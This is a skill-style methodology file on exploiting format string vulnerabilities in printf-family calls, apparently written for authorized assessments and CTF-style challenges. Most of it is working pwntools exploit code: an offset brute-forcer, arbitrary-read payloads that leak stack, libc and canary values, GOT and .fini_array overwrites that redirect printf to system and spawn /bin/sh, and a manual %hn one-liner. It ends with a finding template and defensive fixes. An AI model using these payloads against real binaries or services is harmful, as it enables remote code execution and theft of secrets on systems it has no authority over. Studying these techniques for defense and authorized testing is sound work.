name: exploiting-format-string-vulnerabilities description: Methodology for exploiting format string bugs where attacker-controlled data reaches the format argument of printf-family functions, enabling stack/memory disclosure (info leaks for ASLR/PIE/canary defeat) and arbitrary write primitives (%n) to hijack control flow via GOT/.fini_array overwrites. domain: cybersecurity subdomain: binary-exploitation tags:
- binary-exploitation
- format-string
- exploit-development version: '1.0' author: xalgorix license: Apache-2.0
Exploiting Format String Vulnerabilities
When to Use
- During authorized binary/exploitation assessments when attacker input is passed as the first argument (the format)
to
printf,fprintf,sprintf,snprintf,vprintf,syslog, or similar. - When you need a memory-disclosure primitive to leak stack contents, a libc/PIE pointer, or a stack canary to defeat ASLR/PIE/canary protections.
- When you have an arbitrary-write primitive opportunity via
%n/%hnto overwrite a GOT entry,.fini_array, a saved return address, or a function pointer. - On Windows x64 services where a buggy
_snprintf(dst, len, attacker_fmt)call provides no varargs and conversions read pointers out of RCX/RDX/R8/R9 registers.
Critical: Concepts/Steps Most Often Missed
- Put the format specifiers BEFORE the target address, not after.
printfstops reading at the first NUL byte. If you sendp64(addr) + b"%7$s", the address (which contains NUL bytes in its high bytes) terminates the string and the specifiers are never processed. Sendb"%7$s" + padding + p64(addr)instead, and align so the address lands on a pointer boundary. - Use
%hn(2 bytes), not%n(4 bytes), for full addresses. Writing a 4-byte value like0x08049724in one go requires printing billions of characters. Split the write into two%hnoperations (high and low halves) and emit the smaller half-value first. - Confirm the offset precisely. Sending
AAAA%p%p%p...is not enough; brute-forceAAAA%N$puntil the output shows0x41414141and verify withBBBBthat you control a full aligned pointer slot. Off-by-one offset errors silently read the wrong slot. %nwrites are disabled by FORTIFY._FORTIFY_SOURCEaborts on%nin writable format strings; on those targets you are limited to read primitives (still enough to leak canary/libc and pair with another bug).- Let pwntools do the math.
fmtstr_payload()andFmtStr()compute the offset and craft the multi-write payload; manual HOB/LOB arithmetic is error-prone.
How to CONFIRM
A read primitive is confirmed when a chosen %N$p/%N$s returns attacker-known data: send b"AAAA%6$p" and confirm
0x41414141 (or 0x...41414141 on 64-bit) appears in the output — that proves your buffer is at stack arg 6. A write
primitive is confirmed by reading back the target: overwrite a GOT entry with a sentinel, then dump it with %s/%p and
verify the bytes changed, or set a breakpoint in gdb on the write target and observe the value land.
Workflow
Step 1: Confirm the Bug and Find the Argument Offset
from pwn import *
context.binary = elf = ELF('./chall', checksec=False)
# Brute-force the stack offset where our input lands
for i in range(1, 50):
p = process('./chall')
p.sendline(f"AAAA%{i}$p".encode())
out = p.clean()
if b"0x41414141" in out:
log.success(f"Input is at offset {i}")
p.close(); break
p.close()
A quick manual probe: %p %p %p %p %p %p printed by a printf(buffer) reveals stack values; %x leaking attacker
bytes proves the format string is attacker-controlled.
Step 2: Build the Read Primitive (Leak Stack / libc / Canary)
# Read an arbitrary address: format specifier FIRST, address LAST (no early NUL)
payload = b"%7$s" # offset 7 holds our address slot
payload += b"|" * (8 - len(b"%7$s")) # pad so the pointer is 8-aligned
payload += p64(0x404020) # address to dereference and print as string
p.sendline(payload)
log.info(p.clean())
# Leak a libc pointer from the stack, then compute base
p.sendline(b"%25$p")
leak = int(p.recvline().strip(), 16)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc.address = leak - libc.symbols['__libc_start_main'] - 243
log.info("libc base @ %#x", libc.address)
Reads are useful to dump the binary from memory and to grab canaries, encryption keys, or hardcoded passwords stored on the stack/BSS.
Step 3: Build the Write Primitive and Hijack Control Flow
# Let pwntools craft the multi-%hn write. Overwrite printf@GOT -> system
payload = fmtstr_payload(offset, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)
# Next call to printf(user_input) now runs system(user_input)
p.sendline(b'/bin/sh')
p.interactive()
Manual two-step %hn (when not using pwntools), writing high-order then low-order halves with %.<pad>x%<arg>$hn:
# Example: write 0x080497xx split into two 16-bit halves at offsets 4 and 5
python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+"%.49143x"+"%4$hn"+"%.15408x"+"%5$hn"'
Step 4: Make the Bug Reusable / Escalate
# If you need another pass through the vulnerable code, overwrite .fini_array
# to loop back to main, then perform the GOT overwrite on the second pass.
fmt = FmtStr(execute_fmt=send_payload, offset=offset, padlen=padlen)
fmt.write(elf.symbols['__init_array_end'], INIT_LOOP_ADDR) # loop back
fmt.write(elf.got['printf'], elf.plt['system']) # then redirect
fmt.execute_writes()
On Windows x64, prepend %p to leak whatever pointer sits in R9 at the call-site, recover the module base as
leak - known_offset, and reuse it to compute gadget/IAT addresses for a ROP chain.
Key Concepts
| Concept | Description |
|---|---|
| Format specifier | %x/%p read stack words, %s dereferences a pointer and prints a string, %n writes the byte count to a pointed address. |
| Direct parameter access | %N$x selects the N-th argument directly (e.g. %4$p reads the 4th), avoiding long specifier chains. |
| Argument offset | The stack index at which attacker-controlled input appears; the anchor for both read and write primitives. |
%n / %hn / %hhn |
Write the number of bytes printed so far into an address: 4 bytes / 2 bytes / 1 byte respectively. |
| HOB / LOB | High-order and low-order halves of a target address; written separately with two %hn operations. |
| GOT overwrite | Replacing a GOT entry (e.g. printf) with another function (e.g. system) so the next call is redirected. |
.fini_array loop |
Overwriting a destructor pointer to re-enter main, giving extra exploitation passes. |
| Width padding | %.<num>d prints num characters cheaply so %n writes a large value without huge buffers. |
Tools & Systems
| Tool | Purpose |
|---|---|
| pwntools | fmtstr_payload, FmtStr, ELF.got/ELF.plt/ELF.symbols, process/remote IO, automated offset detection. |
| gdb + pwndbg/GEF | Inspect the stack at the printf call, confirm writes landed, set breakpoints on GOT targets. |
| checksec | Detect RELRO (full RELRO makes GOT read-only), FORTIFY (%n blocked), PIE, canary. |
| objdump / readelf | Enumerate GOT/PLT entries and .fini_array/.init_array addresses. |
| radare2 / Ghidra | Reverse the call-site to confirm the format argument is attacker-controlled and find static offsets (Windows base recovery). |
| one_gadget | After a libc leak, find a single-shot shell gadget to target with the write. |
Common Scenarios
Scenario 1: Stack secret leak (no flow control needed)
printf(buffer) echoes user input. Brute-forcing %N$s reveals a hardcoded password stored on the stack at offset 10,
or %N$p leaks a heap/libc address — enough to win without altering execution.
Scenario 2: GOT overwrite to system
A 32-bit no-RELRO binary calls printf(user) in a loop. fmtstr_payload(5, {got['printf']: libc.sym['system']})
redirects printf to system; the next iteration with input /bin/sh spawns a shell.
Scenario 3: ret2win via .fini_array + GOT
A binary with a one-shot format string overwrites .fini_array to loop back to main, then on the second pass writes
the win/system address into a GOT slot used right after.
Scenario 4: Windows x64 ASLR defeat
A service does _snprintf(dst, 0xff2, keyData) with no varargs. A leading %p prints the value in R9 — a stable
in-module pointer — letting the attacker compute the image base and bootstrap a ROP chain.
Output Format
## Format String Finding
**Vulnerability**: Uncontrolled format string (CWE-134)
**Severity**: Critical (arbitrary read+write -> RCE) / High (info leak only)
**Binary**: ./chall (x86-64, Partial RELRO, No PIE, No FORTIFY)
**Call site**: printf(user_input) in handle_request()
### Primitive Confirmation
- Read: input at stack offset 6 (AAAA%6$p -> 0x...41414141)
- Leak: libc base @ 0x7ffff7da5000 via %25$p
- Write: %hn enabled (no FORTIFY), Partial RELRO -> GOT writable
### Exploitation
fmtstr_payload(6, {got['printf']: libc.sym['system']})
Result: printf("/bin/sh") executed system("/bin/sh") -> shell as service user.
### Impact
Arbitrary memory read/write leading to remote code execution.
### Recommendation
1. Never pass user input as the format argument: use printf("%s", user_input).
2. Compile with -Wformat -Wformat-security -Werror=format-security and _FORTIFY_SOURCE=2.
3. Enable Full RELRO (-Wl,-z,relro,-z,now) to make the GOT read-only.
4. Enable PIE/ASLR and stack canaries.